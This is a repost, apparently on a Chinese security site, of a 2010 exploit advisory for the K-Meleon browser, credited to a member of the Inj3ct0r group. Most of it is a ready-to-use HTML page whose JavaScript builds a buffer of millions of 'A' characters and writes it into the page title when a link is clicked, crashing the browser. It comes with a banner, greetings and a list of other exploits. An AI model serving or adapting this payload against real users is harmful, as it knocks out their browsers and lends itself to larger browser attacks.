首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
K-Meleon Remote Denial of Service Exploit
来源:shell_c99[at]yahoo.com 作者:shell_c99 发布时间:2010-06-11  
=========================================
K-Meleon Remote Denial of Service Exploit
=========================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1               ##########################################             1
0               I'm Sid3^effects member from Inj3ct0r Team             1
1               ##########################################             0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

Name : K-Meleon Remote Denial of Service Exploit
Date : june, 10 2010
Vendor url :http://kmeleon.sourceforge.net
Tested on : Windows XP SP3
Author : Sid3^effects aKa HaRi <shell_c99[at]yahoo.com>
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,gunslinger_
greetz to :All ICW members and my friends luv y0 guyz

###############################################################################################################
Description:

K-Meleon is a fast and customizable web browser that can be used instead of Internet Explorer on Windows. Powered by the same Gecko engine as

the Firefox and Mozilla browsers, K-Meleon provides users with a secure browsing experience.

###############################################################################################################
Xploit:
     
<html>
<head><title>K-Meleon Remote  Remote Denial of Service By Sid3^effects </title>
<script type="text/javascript">
function ICW() {
    var buffer = "";
    for (var i = 0; i < 6000; i++) {
        buffer += "A";
    }
    var buffer2 = buffer;
    for (i = 0; i < 5000; i++) {
        buffer2 += buffer;
    }
    document.title = buffer2;
}
</script>
</head>
<body><center><h1><strong>K-Meleon Remote Denial of Service Exploit</strong></h1>
<body><center><h2><strong>Sid3^effects member from Inj3ct0r Team</strong></h2>
<br><h3>==> <a href="javascript:ICW();">CLICK HERE</a></font> <==</h3>
</body></html>

###############################################################################################################
# 0day no more
# Sid3^effects

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Orca Browser Remoter Denial Of
·AWCM CMS Local File Inclusion
·Firefox 3.6.3 Remoter Denial O
·ActivePerl v5.8.8.817 Buffer O
·Solaris/x86 - Sync() & reboot(
·Microsoft Windows Help Centre
·Netvolution CMS <= 2.x SQL Inj
·Safari 5.0 Remote Buffer OverF
·Adobe InDesign CS3 INDD File H
·Netscape Navigator v9.0.0.6 (m
·nginx 0.8.36 Source Disclosure
·Motorola SB5101 Hax0rware Even
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved